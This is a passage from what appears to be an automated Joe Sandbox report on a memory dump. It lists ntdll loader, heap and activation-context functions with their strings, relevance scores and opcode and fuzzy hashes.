                                    • Part of subcall function 018E2DF0: LdrInitializeThunk.NTDLL ref: 018E2DFA
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018E0BA3
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018E0BB6
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018E0D60
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018E0D74
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                  • String ID:
                                  • API String ID: 1404860816-0
                                  • Opcode ID: 908632eb89808ad2461a8472c3fa2a29ade458885675f92468606503dd20d7dc
                                  • Instruction ID: 84c4382794dd982d494ea318fabd29df22a68c201df2552a688ea0c5c19ca39e
                                  • Opcode Fuzzy Hash: 908632eb89808ad2461a8472c3fa2a29ade458885675f92468606503dd20d7dc
                                  • Instruction Fuzzy Hash: 4B427C71A00719DFDB21CF28C894BAAB7F9FF05304F1445A9E989DB245E770AA84CF61
                                  Function 018AA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                  • API String ID: 0-379654539
                                  • Opcode ID: a1e4aee68d906eee3fa52e3219ab67bb8f663c181d51ce571bf6060ddbbc0977
                                  • Instruction ID: f3670fb8697bbede811423b5c715f9b8751151fcc89fb9758736a9e54d73987c
                                  • Opcode Fuzzy Hash: a1e4aee68d906eee3fa52e3219ab67bb8f663c181d51ce571bf6060ddbbc0977
                                  • Instruction Fuzzy Hash: C9C1AF74508386CFE729CF58C084B6AB7E4FF84708F444869F995CBA91E734CA49CB56
                                  Function 018D8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 018D8421
                                  • LdrpInitializeProcess, xrefs: 018D8422
                                  • @, xrefs: 018D8591
                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 018D855E
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1918872054
                                  • Opcode ID: f35ce1d2f6138e0b67194ab326da28bb20f4063bec9854279ad37294886b3c4c
                                  • Instruction ID: dc01b8c38e1bdb43818637b8a805b71822d9e64063544113117f1c5ad87be464
                                  • Opcode Fuzzy Hash: f35ce1d2f6138e0b67194ab326da28bb20f4063bec9854279ad37294886b3c4c
                                  • Instruction Fuzzy Hash: 39918E71508349AFE722DF69CC84EABBBECBB85744F40092EF684D2151E774DA44CB62
                                  Function 018D273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                  Download Yara Rule
                                  Strings
                                  • .Local, xrefs: 018D28D8
                                  • SXS: %s() passed the empty activation context, xrefs: 019121DE
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019122B6
                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019121D9, 019122B1
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                  • API String ID: 0-1239276146
                                  • Opcode ID: 8c05de59116a67994b7087bb07b506909f7ca9900040d3e146ef4e2e2c0c9490
                                  • Instruction ID: dade093586082829c0b8264e570a2db65bb82620248411cddf18ac76ca1fccd9
                                  • Opcode Fuzzy Hash: 8c05de59116a67994b7087bb07b506909f7ca9900040d3e146ef4e2e2c0c9490
                                  • Instruction Fuzzy Hash: 15A19B3190132DABDB25DF68C888BA9B7B6BF58314F2545E9D908E7255D7309F80CF90
                                  Function 018D4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlDeactivateActivationContext, xrefs: 01913425, 01913432, 01913451
                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0191342A
                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01913437
                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01913456
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                  • API String ID: 0-1245972979
                                  • Opcode ID: 147bb74a2c27329abd4609e03236ac2d2450bd1089f41e1cd1bd88753b3fc33c
                                  • Instruction ID: a37d39cfff54565e9a9e5729cb0dcb7e37cb6eb67e9141bd12f5af02914797f8
                                  • Opcode Fuzzy Hash: 147bb74a2c27329abd4609e03236ac2d2450bd1089f41e1cd1bd88753b3fc33c
                                  • Instruction Fuzzy Hash: 716124326807169BD722CF1DC881B2AB7F5FF90B20F14852DE959DB684DB34EA41CB91
                                  Function 018A64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                  Download Yara Rule
                                  Strings
                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01901028
                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01900FE5
                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019010AE
                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0190106B
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                  • API String ID: 0-1468400865
                                  • Opcode ID: 73b9deb04d428ce508d1ebfb4f3f97b9de838f6b1692022704bf6419c88cf70a
                                  • Instruction ID: 6765986e60502fdfd35d898ebf8dc02cb1469dde3d40ea456684bcfd1427d82b
                                  • Opcode Fuzzy Hash: 73b9deb04d428ce508d1ebfb4f3f97b9de838f6b1692022704bf6419c88cf70a
                                  • Instruction Fuzzy Hash: 4C71E4B19043059FDB21DF18C884B977FA8EF95754F580468F988CB28AE374D688CBD2
                                  Function 018C245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0190A9A2
                                  • apphelp.dll, xrefs: 018C2462
                                  • LdrpDynamicShimModule, xrefs: 0190A998
                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0190A992
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-176724104
                                  • Opcode ID: 7a7be5ba7d598aec93510ea7408a45669673113ba56170de583eb9a4b33e29df
                                  • Instruction ID: fea34aded3dc054304dc9d67ba5ddfb0a3cb2a299ce246aba42641e8b53bc19e
                                  • Opcode Fuzzy Hash: 7a7be5ba7d598aec93510ea7408a45669673113ba56170de583eb9a4b33e29df
                                  • Instruction Fuzzy Hash: D1311671600301AFDB329F6E9985AAAB7BAFB84B04F15001DE915AB295D7709A82C7C1
                                  Function 018B29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                  Download Yara Rule
                                  Strings
                                  • HEAP[%wZ]: , xrefs: 018B3255
                                  • HEAP: , xrefs: 018B3264
                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 018B327D
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                  • API String ID: 0-617086771
                                  • Opcode ID: c182d90503ddb526965b4192b14cf6be2c31b07de05fedbb004c4cbc1eccb6c2
                                  • Instruction ID: 2dfcd1b6aa9884f62059e0911041606a790f74ffcd958683cda4e60590c18718
                                  • Opcode Fuzzy Hash: c182d90503ddb526965b4192b14cf6be2c31b07de05fedbb004c4cbc1eccb6c2
                                  • Instruction Fuzzy Hash: AD92AB71A046499FDB25CF68C484BEEBBF2FF49304F188069E859EB352D734AA45CB50
                                  Function 018B0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-4253913091
                                  • Opcode ID: b93bbfaa91de3bd1843d033862363ea4c74ec2e3b199da52763456bf63995c9c
                                  • Instruction ID: 78586f90bb78ff0ad94d4c79a3e418eed1514cf371bd00f725f9bff4a5894c75
                                  • Opcode Fuzzy Hash: b93bbfaa91de3bd1843d033862363ea4c74ec2e3b199da52763456bf63995c9c
                                  • Instruction Fuzzy Hash: CEF19C70600606DFEB26CF68C894BAABBB5FF44704F148168E51ADB391D734EA81CF91
                                  Function 018C6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $@
                                  • API String ID: 0-1077428164
                                  • Opcode ID: 8a02b5c790d61554cbfa23512efd50b0c202bc9792b2d8d8a4ea34e6a0e9e600
                                  • Instruction ID: 66ad1636d0972d21b81ce5bd7115af4dd0c1dd7f06dd537218068f184b7f5aac
                                  • Opcode Fuzzy Hash: 8a02b5c790d61554cbfa23512efd50b0c202bc9792b2d8d8a4ea34e6a0e9e600
                                  • Instruction Fuzzy Hash: D5C27F716083459FE726CF28C881BABBBE5AF88B14F04896DF989C7241D734DA45CF52
                                  Function 0189A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: FilterFullPath$UseFilter$\??\
                                  • API String ID: 0-2779062949
                                  • Opcode ID: a0e1e78c0bec3613669d2eba18e3c1aa09ee3922c43c6c1b379540237180822d
                                  • Instruction ID: acf31714e33dafd151f89c5de2e6433cde615344ce46f822c8d6cf3fb11479e5
                                  • Opcode Fuzzy Hash: a0e1e78c0bec3613669d2eba18e3c1aa09ee3922c43c6c1b379540237180822d
                                  • Instruction Fuzzy Hash: 5AA157719116299BDF319B68CC88BAAB7B8EF44704F1001EAEA09E7251E7359F84CF51
                                  Function 018C0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0190A121
                                  • Failed to allocated memory for shimmed module list, xrefs: 0190A10F
                                  • LdrpCheckModule, xrefs: 0190A117
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-161242083
                                  • Opcode ID: f7f40234f7d3820b061031d2457cf17cd031b177d89813fd531a18433c359f9a
                                  • Instruction ID: e24cf2c78e83c0766bf8e9dc308ca7b3c27694ff39a9a97410ac6da757954902
                                  • Opcode Fuzzy Hash: f7f40234f7d3820b061031d2457cf17cd031b177d89813fd531a18433c359f9a
                                  • Instruction Fuzzy Hash: 0571BD75A00309DFDB26DF6CC981AAEB7F4FB48B44F14406DE906EB251E634EA41CB91
                                  Function 018B0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-1334570610
                                  • Opcode ID: fe2d8e738aaa067b96fe2f017126e274d5a5d05d1011d62615a6983df5c716f5
                                  • Instruction ID: 60f5e6b557297fffbbe42a48abfa8d0240d33eb5ff16091eabfd494672fb1f19
                                  • Opcode Fuzzy Hash: fe2d8e738aaa067b96fe2f017126e274d5a5d05d1011d62615a6983df5c716f5
                                  • Instruction Fuzzy Hash: A7617971600305DFEB29CF28C480BAABBB5FF45704F158559E499CB396D770E981CB91
                                  Function 018DC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 019182E8
                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 019182DE
                                  • Failed to reallocate the system dirs string !, xrefs: 019182D7
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1783798831
                                  • Opcode ID: c0f9bb4282ec95b0ee44812124b9cafcecf5cb12996388f0718f7da586e87683
                                  • Instruction ID: 5eab72d5a2f4bbad266acc6993d142524cbbb6cd1766842e105554a602dfb793
                                  • Opcode Fuzzy Hash: c0f9bb4282ec95b0ee44812124b9cafcecf5cb12996388f0718f7da586e87683
                                  • Instruction Fuzzy Hash: 3E410471505305ABDB21EB6DD884B5B77E8AF48750F01482EF948D3254E774DA00CB92
                                  Function 0195C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                  Download Yara Rule
                                  Strings
                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0195C1C5
                                  • PreferredUILanguages, xrefs: 0195C212
                                  • @, xrefs: 0195C1F1
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                  • API String ID: 0-2968386058
                                  • Opcode ID: cdd81b202773c0541de7707ab102484f07a3558c3b05de93a62251d0fa12ef48
                                  • Instruction ID: c71678d878d4f97ecd0e93d32c26c4ee801c1dec55e5fab745418069fde68e05
                                  • Opcode Fuzzy Hash: cdd81b202773c0541de7707ab102484f07a3558c3b05de93a62251d0fa12ef48
                                  • Instruction Fuzzy Hash: 43417171E00309EBDF51DAD8C891FEEBBBCAB14745F04416AEA09F7240D774DA448B91
                                  Function 01934144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                  • API String ID: 0-1373925480
                                  • Opcode ID: ddd8321d192891a50beea8390fac47403806f015fdefe6feebdeebd6f5b5a5cc
                                  • Instruction ID: 18d88def2e0b98f458229ab2ac4cee553ab347ae4b3b5eb101da34bc9309c01a
                                  • Opcode Fuzzy Hash: ddd8321d192891a50beea8390fac47403806f015fdefe6feebdeebd6f5b5a5cc
                                  • Instruction Fuzzy Hash: 1341F331A00659CBEB25DBD8C884BADBBB9FFA5340F16045AD909FB791D7348A01CB51
                                  Function 01924755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  Strings
                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01924888
                                  • LdrpCheckRedirection, xrefs: 0192488F
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01924899
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 0-3154609507
                                  • Opcode ID: 50e5a8eee7bea1b7755dc7807e223f2fae2ed6d21620e52ee22183e7061959a0
                                  • Instruction ID: 2d2f0bd2d6bd5020ec69d7e3cb7e75151c280b58baf071f1a74d3ec25495a35e
                                  • Opcode Fuzzy Hash: 50e5a8eee7bea1b7755dc7807e223f2fae2ed6d21620e52ee22183e7061959a0
                                  • Instruction Fuzzy Hash: 65419E32A147719BCB21DE6CD840A26BBE8BF89B51B060569ED5DDB319D770E800CB92
                                  Function 018B0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-2558761708
                                  • Opcode ID: 02ef6d193a498ae02e742002a98336194426fc7cc70b4ff0b4feca240c11c314
                                  • Instruction ID: 1fc09cc20bed0bb60f673f3dee25a6d390efe069fd6c9854e62a922eca2d498c
                                  • Opcode Fuzzy Hash: 02ef6d193a498ae02e742002a98336194426fc7cc70b4ff0b4feca240c11c314
                                  • Instruction Fuzzy Hash: 1911DF313241069FEB2ACB18C4C4FBAB3A9EF40B1AF1A8159F40ACB391DB34D941CB51
                                  Function 019220DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01922104
                                  • LdrpInitializationFailure, xrefs: 019220FA
                                  • Process initialization failed with status 0x%08lx, xrefs: 019220F3
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2986994758
                                  • Opcode ID: d361e852e0f7d0f92592e8e6dd7684bbcde25024c5e523cc18186fd9cfefe9ec
                                  • Instruction ID: 75030175b4acc8d158330a2d7623fce747cc098f894bae742c645c20dad02150
                                  • Opcode Fuzzy Hash: d361e852e0f7d0f92592e8e6dd7684bbcde25024c5e523cc18186fd9cfefe9ec
                                  • Instruction Fuzzy Hash: 0EF0C8756403186BEB24EB5CCC46F99376DFB41B54F200059F604A738AD6B4AA40C651
                                  Function 018B03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: #%u
                                  • API String ID: 48624451-232158463
                                  • Opcode ID: e9d21ff851c3e1790eaed20998b7c005fe371aa0f735f3691f29157a0368cd28
                                  • Instruction ID: c1dbdd94cb578ce48c7ce999e893dad8bd2f292fc3ff0f776d62b1074e7ef8a1
                                  • Opcode Fuzzy Hash: e9d21ff851c3e1790eaed20998b7c005fe371aa0f735f3691f29157a0368cd28
                                  • Instruction Fuzzy Hash: 50712C71A0014A9FDB01DF98C994BEEBBF8BF58704F144065EA05E7251EA38EE41CB61
                                  Function 018AA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                  Download Yara Rule
                                  Strings
                                  • LdrResSearchResource Exit, xrefs: 018AAA25
                                  • LdrResSearchResource Enter, xrefs: 018AAA13
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                  • API String ID: 0-4066393604
                                  • Opcode ID: d6900e152cb461edcb52084dba8c32a12203448d356e4232b9609fe016279ff6
                                  • Instruction ID: cad4be1b109bcf758d9f7ec2bdb7f1d8ad104a220efdbbcd44edac12f6903884
                                  • Opcode Fuzzy Hash: d6900e152cb461edcb52084dba8c32a12203448d356e4232b9609fe016279ff6
                                  • Instruction Fuzzy Hash: A3E1A371E002199FFB26CF9DC994BAEBBB9BF48314F50042AEA05E7681D734DA41CB50
                                  Function 0196A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: `$`
                                  • API String ID: 0-197956300
                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction ID: ec857345355833c38e8cd5c36becc522115eaebf1930a80384a9506792d36e2f
                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction Fuzzy Hash: 1DC1E3312043429BE725CF28C841B6BBBE9BFD4719F084A2DF69ADB290D774D905CB61
                                  Function 0191E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Legacy$UEFI
                                  • API String ID: 2994545307-634100481
                                  • Opcode ID: 3e3a562e4bebe28e9abf7357dd44bc909dca2e80e9b0ffd4ea98967298c6e82b
                                  • Instruction ID: 5ac198057960ca4e24e9e37d6a885b77beec8882df7bd379a3f1f9d0089185d0
                                  • Opcode Fuzzy Hash: 3e3a562e4bebe28e9abf7357dd44bc909dca2e80e9b0ffd4ea98967298c6e82b
                                  • Instruction Fuzzy Hash: B5616D71E0020D9FEB16DFA8C940BADBBF9FB48700F14446DEA59EB255DB31A980CB51
                                  Function 019443D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$MUI
                                  • API String ID: 0-17815947
                                  • Opcode ID: 0f75198ea0ad2ecb202f15b8f8abbd4c34af47f9cf4b990ad8aaed4d48cf3d12
                                  • Instruction ID: ea8b69e15eb37dc26c0b461085806809d56feeb1e128ea67bca6d67485d3f924
                                  • Opcode Fuzzy Hash: 0f75198ea0ad2ecb202f15b8f8abbd4c34af47f9cf4b990ad8aaed4d48cf3d12
                                  • Instruction Fuzzy Hash: 6E510871E0021DAFDF11DFA9CC94FEEBBBDAB44754F100529E615E7290D6709A05CBA0
                                  Function 018A04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                  Download Yara Rule
                                  Strings
                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 018A063D
                                  • kLsE, xrefs: 018A0540
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                  • API String ID: 0-2547482624
                                  • Opcode ID: 09685ce6024e0a72fd4d761000a95b5e80e1c7e595a2d95a8b89c9d34aade36c
                                  • Instruction ID: 6d5e0e63b87f4d924dda64b849ed904185153c90bca6e08c7e04d0add4ea627c
                                  • Opcode Fuzzy Hash: 09685ce6024e0a72fd4d761000a95b5e80e1c7e595a2d95a8b89c9d34aade36c
                                  • Instruction Fuzzy Hash: 8851D0715047468FE724EF68C4806A7BBE4AF85308F50483EFAEAC7241E770E645CB92
                                  Function 018AA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 018AA309
                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 018AA2FB
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                  • API String ID: 0-2876891731
                                  • Opcode ID: 27250b2a8a86207b339ccc28f2ad38b3c056458f832becfa7f980f51a9a2857b
                                  • Instruction ID: 68e6f9671378c838e10c7353699b2643585670a36856734bfaa7afcb3e938dc3
